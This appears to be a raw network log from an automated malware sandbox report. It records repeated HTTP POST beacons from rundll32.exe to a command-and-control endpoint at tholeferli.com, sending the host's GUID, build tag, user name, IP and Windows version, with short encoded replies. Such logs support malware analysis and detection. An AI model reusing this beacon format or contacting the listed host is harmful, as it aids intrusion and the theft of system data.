    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:33.020685911 CEST | 355 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:32 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 56 4d 4e 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cVMNEARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
54 | 192.168.2.22 | 49221 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:33.445880890 CEST | 356 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:33.601244926 CEST | 356 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:33 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cNHSMARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
55 | 192.168.2.22 | 49222 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:33.880182028 CEST | 357 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:34.034898996 CEST | 357 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:33 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 4d 41 5a 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cMAZNARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
56 | 192.168.2.22 | 49223 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:34.310890913 CEST | 358 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:34.467071056 CEST | 358 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:34 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cTKPGARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
57 | 192.168.2.22 | 49224 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:34.750005960 CEST | 359 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:34.902857065 CEST | 359 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:34 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 41 56 45 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cAVEZARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
58 | 192.168.2.22 | 49225 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:35.193599939 CEST | 360 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:35.361417055 CEST | 360 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:35 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 54 4e 4d 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cTNMGARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
59 | 192.168.2.22 | 49226 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:35.637610912 CEST | 361 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:35.809911013 CEST | 361 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:35 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 42 59 42 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cBYBYARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.22 | 49174 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:06.534090996 CEST | 296 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:06.691916943 CEST | 297 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:06 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 4b 48 53 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cKHSPARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
60 | 192.168.2.22 | 49227 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:36.091660023 CEST | 362 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:36.260988951 CEST | 363 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:36 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cZBYAARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
61 | 192.168.2.22 | 49228 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:36.546857119 CEST | 363 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:36.715334892 CEST | 364 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:36 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 48 5a 41 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cHZASARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
62 | 192.168.2.22 | 49229 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:36.997251987 CEST | 365 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:37.152971029 CEST | 365 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:37 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 4d 51 4a 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cMQJNARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
63 | 192.168.2.22 | 49230 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:37.433851004 CEST | 366 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:37.590899944 CEST | 366 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:37 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 5a 54 47 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cZTGAARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
64 | 192.168.2.22 | 49231 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:37.876390934 CEST | 367 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:38.042412996 CEST | 367 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:37 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 47 41 5a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cGAZTARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
65 | 192.168.2.22 | 49232 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:38.326898098 CEST | 368 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
    Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:38.494982004 CEST | 368 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 22 Jul 2021 14:11:38 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 42 4b 50 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cBKPYARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                66192.168.2.2249233194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:38.776685953 CEST369OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:38.932934999 CEST | 369 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:38 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 47 54 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cCGTXARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                67 | 192.168.2.22 | 49234 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:39.217582941 CEST | 370 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:39.373692989 CEST | 370 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:39 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZQJAARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                68 | 192.168.2.22 | 49235 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:39.651362896 CEST | 371 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:39.809314013 CEST | 372 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:39 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVZAEARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                69 | 192.168.2.22 | 49236 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:40.088572979 CEST | 372 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:40.245002031 CEST | 373 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:40 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZBYAARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
